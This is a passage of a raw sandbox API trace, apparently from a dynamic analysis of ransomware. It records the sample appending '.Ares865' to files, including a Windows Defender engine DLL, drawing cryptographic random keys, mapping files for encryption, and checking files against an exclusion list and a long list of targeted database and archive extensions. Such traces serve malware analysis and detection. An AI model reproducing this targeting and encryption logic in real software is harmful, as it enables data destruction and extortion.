wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.Ares865") returned 124 [0084.217] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.ares865"), dwFlags=0x1) returned 1 [0084.218] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8199504) returned 1 [0084.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.219] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.220] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.220] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.220] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d2050, lpName=0x0) returned 0x15c [0084.221] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x600000, dwNumberOfBytesToMap=0x1d2050) returned 0x3030000 [0084.509] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.509] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.509] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0084.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0084.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\VISIO", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\VISIO") returned="C:\\Users\\All Users\\Microsoft\\VISIO" [0084.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Vault", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Microsoft\\Vault" [0084.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures" [0084.549] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 83 [0084.549] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.ares865"), dwFlags=0x1) returned 1 [0084.560] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0084.560] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0084.560] CloseHandle (hObject=0x0) returned 0 [0084.561] CloseHandle (hObject=0x118) returned 1 [0084.561] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="aoldtz.exe") returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2=".") returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="..") returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="windows") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="bootmgr") returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="temp") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="pagefile.sys") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="boot") returned 1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="ids.txt") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="ntuser.dat") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="perflogs") returned -1 [0084.561] lstrcmpiW (lpString1="Default Pictures", lpString2="MSBuild") returned -1 [0084.561] lstrlenW (lpString="Default Pictures") returned 16 [0084.561] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0084.561] lstrcpyW (in: lpString1=0x2cce466, lpString2="Default Pictures" | out: lpString1="Default Pictures") returned="Default Pictures" [0084.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0084.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0084.561] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0084.561] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2="aoldtz.exe") returned 1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2=".") returned 1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2="..") returned 1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2="windows") returned -1 [0084.561] lstrcmpiW (lpString1="guest.bmp", lpString2="bootmgr") returned 1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="temp") returned -1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="pagefile.sys") returned -1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="boot") returned 1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="ids.txt") returned -1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="ntuser.dat") returned -1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="perflogs") returned -1 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2="MSBuild") returned -1 [0084.562] lstrlenW (lpString="guest.bmp") returned 9 [0084.562] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0084.562] lstrcpyW (in: lpString1=0x2cce466, lpString2="guest.bmp" | out: lpString1="guest.bmp") returned="guest.bmp" [0084.562] lstrlenW (lpString="guest.bmp") returned 9 [0084.562] lstrlenW (lpString="Ares865") returned 7 [0084.562] lstrcmpiW (lpString1="est.bmp", lpString2="Ares865") returned 1 [0084.562] lstrlenW (lpString=".dll") returned 4 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2=".dll") returned 1 [0084.562] lstrlenW (lpString=".lnk") returned 4 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2=".lnk") returned 1 [0084.562] lstrlenW (lpString=".ini") returned 4 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2=".ini") returned 1 [0084.562] lstrlenW (lpString=".sys") returned 4 [0084.562] lstrcmpiW (lpString1="guest.bmp", lpString2=".sys") returned 1 [0084.562] lstrlenW (lpString="guest.bmp") returned 9 [0084.562] lstrlenW (lpString="bak") returned 3 [0084.562] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.562] lstrlenW (lpString="ba_") returned 3 [0084.562] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.562] lstrlenW (lpString="dbb") returned 3 [0084.562] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.562] lstrlenW (lpString="vmdk") returned 4 [0084.562] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.562] lstrlenW (lpString="rar") returned 3 [0084.562] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.563] lstrlenW (lpString="zip") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.563] lstrlenW (lpString="tgz") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.563] lstrlenW (lpString="vbox") returned 4 [0084.563] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.563] lstrlenW (lpString="vdi") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.563] lstrlenW (lpString="vhd") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.563] lstrlenW (lpString="vhdx") returned 4 [0084.563] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.563] lstrlenW (lpString="avhd") returned 4 [0084.563] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.563] lstrlenW (lpString="db") returned 2 [0084.563] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.563] lstrlenW (lpString="db2") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.563] lstrlenW (lpString="db3") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.563] lstrlenW (lpString="dbf") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.563] lstrlenW (lpString="mdf") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.563] lstrlenW (lpString="mdb") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.563] lstrlenW (lpString="sql") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.563] lstrlenW (lpString="sqlite") returned 6 [0084.563] lstrcmpiW (lpString1="st.bmp", lpString2="sqlite") returned 1 [0084.563] lstrlenW (lpString="sqlite3") returned 7 [0084.563] lstrcmpiW (lpString1="est.bmp", lpString2="sqlite3") returned -1 [0084.563] lstrlenW (lpString="sqlitedb") returned 8 [0084.563] lstrcmpiW (lpString1="uest.bmp", lpString2="sqlitedb") returned 1 [0084.563] lstrlenW (lpString="xml") returned 3 [0084.563] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.563] lstrlenW (lpString="$er") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.564] lstrlenW (lpString="4dd") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.564] lstrlenW (lpString="4dl") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.564] lstrlenW (lpString="^^^") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.564] lstrlenW (lpString="abs") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.564] lstrlenW (lpString="abx") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.564] lstrlenW (lpString="accdb") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accdb") returned 1 [0084.564] lstrlenW (lpString="accdc") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accdc") returned 1 [0084.564] lstrlenW (lpString="accde") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accde") returned 1 [0084.564] lstrlenW (lpString="accdr") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accdr") returned 1 [0084.564] lstrlenW (lpString="accdt") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accdt") returned 1 [0084.564] lstrlenW (lpString="accdw") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accdw") returned 1 [0084.564] lstrlenW (lpString="accft") returned 5 [0084.564] lstrcmpiW (lpString1="t.bmp", lpString2="accft") returned 1 [0084.564] lstrlenW (lpString="adb") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.564] lstrlenW (lpString="adb") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.564] lstrlenW (lpString="ade") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.564] lstrlenW (lpString="adf") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.564] lstrlenW (lpString="adn") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.564] lstrlenW (lpString="adp") returned 3 [0084.564] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.565] lstrlenW (lpString="alf") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.565] lstrlenW (lpString="ask") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.565] lstrlenW (lpString="btr") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.565] lstrlenW (lpString="cat") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.565] lstrlenW (lpString="cdb") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.565] lstrlenW (lpString="ckp") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.565] lstrlenW (lpString="cma") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.565] lstrlenW (lpString="cpd") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.565] lstrlenW (lpString="dacpac") returned 6 [0084.565] lstrcmpiW (lpString1="st.bmp", lpString2="dacpac") returned 1 [0084.565] lstrlenW (lpString="dad") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.565] lstrlenW (lpString="dadiagrams") returned 10 [0084.565] lstrlenW (lpString="daschema") returned 8 [0084.565] lstrcmpiW (lpString1="uest.bmp", lpString2="daschema") returned 1 [0084.565] lstrlenW (lpString="db-journal") returned 10 [0084.565] lstrlenW (lpString="db-shm") returned 6 [0084.565] lstrcmpiW (lpString1="st.bmp", lpString2="db-shm") returned 1 [0084.565] lstrlenW (lpString="db-wal") returned 6 [0084.565] lstrcmpiW (lpString1="st.bmp", lpString2="db-wal") returned 1 [0084.565] lstrlenW (lpString="dbc") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.565] lstrlenW (lpString="dbs") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.565] lstrlenW (lpString="dbt") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.565] lstrlenW (lpString="dbv") returned 3 [0084.565] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.565] lstrlenW (lpString="dbx") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.566] lstrlenW (lpString="dcb") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.566] lstrlenW (lpString="dct") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.566] lstrlenW (lpString="dcx") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.566] lstrlenW (lpString="ddl") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.566] lstrlenW (lpString="dlis") returned 4 [0084.566] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.566] lstrlenW (lpString="dp1") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.566] lstrlenW (lpString="dqy") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.566] lstrlenW (lpString="dsk") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.566] lstrlenW (lpString="dsn") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.566] lstrlenW (lpString="dtsx") returned 4 [0084.566] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.566] lstrlenW (lpString="dxl") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.566] lstrlenW (lpString="eco") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.566] lstrlenW (lpString="ecx") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.566] lstrlenW (lpString="edb") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.566] lstrlenW (lpString="epim") returned 4 [0084.566] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.566] lstrlenW (lpString="fcd") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.566] lstrlenW (lpString="fdb") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.566] lstrlenW (lpString="fic") returned 3 [0084.566] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.567] lstrlenW (lpString="flexolibrary") returned 12 [0084.567] lstrlenW (lpString="fm5") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.567] lstrlenW (lpString="fmp") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.567] lstrlenW (lpString="fmp12") returned 5 [0084.567] lstrcmpiW (lpString1="t.bmp", lpString2="fmp12") returned 1 [0084.567] lstrlenW (lpString="fmpsl") returned 5 [0084.567] lstrcmpiW (lpString1="t.bmp", lpString2="fmpsl") returned 1 [0084.567] lstrlenW (lpString="fol") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.567] lstrlenW (lpString="fp3") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.567] lstrlenW (lpString="fp4") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.567] lstrlenW (lpString="fp5") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.567] lstrlenW (lpString="fp7") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.567] lstrlenW (lpString="fpt") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.567] lstrlenW (lpString="frm") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.567] lstrlenW (lpString="gdb") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.567] lstrlenW (lpString="gdb") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.567] lstrlenW (lpString="grdb") returned 4 [0084.567] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.567] lstrlenW (lpString="gwi") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.567] lstrlenW (lpString="hdb") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.567] lstrlenW (lpString="his") returned 3 [0084.567] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.567] lstrlenW (lpString="ib") returned 2 [0084.567] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.568] lstrlenW (lpString="idb") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.568] lstrlenW (lpString="ihx") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.568] lstrlenW (lpString="itdb") returned 4 [0084.568] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.568] lstrlenW (lpString="itw") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.568] lstrlenW (lpString="jet") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.568] lstrlenW (lpString="jtx") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.568] lstrlenW (lpString="kdb") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.568] lstrlenW (lpString="kexi") returned 4 [0084.568] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.568] lstrlenW (lpString="kexic") returned 5 [0084.568] lstrcmpiW (lpString1="t.bmp", lpString2="kexic") returned 1 [0084.568] lstrlenW (lpString="kexis") returned 5 [0084.568] lstrcmpiW (lpString1="t.bmp", lpString2="kexis") returned 1 [0084.568] lstrlenW (lpString="lgc") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.568] lstrlenW (lpString="lwx") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.568] lstrlenW (lpString="maf") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.568] lstrlenW (lpString="maq") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.568] lstrlenW (lpString="mar") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.568] lstrlenW (lpString="marshal") returned 7 [0084.568] lstrcmpiW (lpString1="est.bmp", lpString2="marshal") returned -1 [0084.568] lstrlenW (lpString="mas") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.568] lstrlenW (lpString="mav") returned 3 [0084.568] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.568] lstrlenW (lpString="maw") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.569] lstrlenW (lpString="mdbhtml") returned 7 [0084.569] lstrcmpiW (lpString1="est.bmp", lpString2="mdbhtml") returned -1 [0084.569] lstrlenW (lpString="mdn") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.569] lstrlenW (lpString="mdt") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.569] lstrlenW (lpString="mfd") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.569] lstrlenW (lpString="mpd") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.569] lstrlenW (lpString="mrg") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.569] lstrlenW (lpString="mud") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.569] lstrlenW (lpString="mwb") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.569] lstrlenW (lpString="myd") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.569] lstrlenW (lpString="ndf") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.569] lstrlenW (lpString="nnt") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.569] lstrlenW (lpString="nrmlib") returned 6 [0084.569] lstrcmpiW (lpString1="st.bmp", lpString2="nrmlib") returned 1 [0084.569] lstrlenW (lpString="ns2") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.569] lstrlenW (lpString="ns3") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.569] lstrlenW (lpString="ns4") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.569] lstrlenW (lpString="nsf") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.569] lstrlenW (lpString="nv") returned 2 [0084.569] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.569] lstrlenW (lpString="nv2") returned 3 [0084.569] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.570] lstrlenW (lpString="nwdb") returned 4 [0084.570] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.570] lstrlenW (lpString="nyf") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.570] lstrlenW (lpString="odb") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.570] lstrlenW (lpString="odb") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.570] lstrlenW (lpString="oqy") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.570] lstrlenW (lpString="ora") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.570] lstrlenW (lpString="orx") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.570] lstrlenW (lpString="owc") returned 3 [0084.570] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.570] lstrlenW (lpString="p96") returned 3 [0084.570] lstrcmpiW 